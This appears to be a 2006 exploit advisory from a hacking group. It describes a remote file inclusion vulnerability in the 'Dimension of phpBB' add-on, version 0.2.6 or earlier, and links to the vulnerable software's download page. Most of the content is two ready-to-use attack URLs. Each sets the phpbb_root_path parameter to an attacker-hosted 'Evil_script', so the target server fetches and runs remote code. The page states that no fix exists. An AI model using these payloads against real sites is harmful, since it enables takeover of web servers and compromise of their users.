Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes

2006-10-05 00:00:00

_________________________________________________________________________


/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ Hacking Security *
| | >< | |
\ \ / /
'.__.'


# Author: SpiderZ
# Dimension of phpBB Remote File Inclusion Vulnerability
# For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


------------------------------------------------------------------------------

# Download: http://www.phpbb-dimension.de/dload.php?action=category&cat_id=16

------------------------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.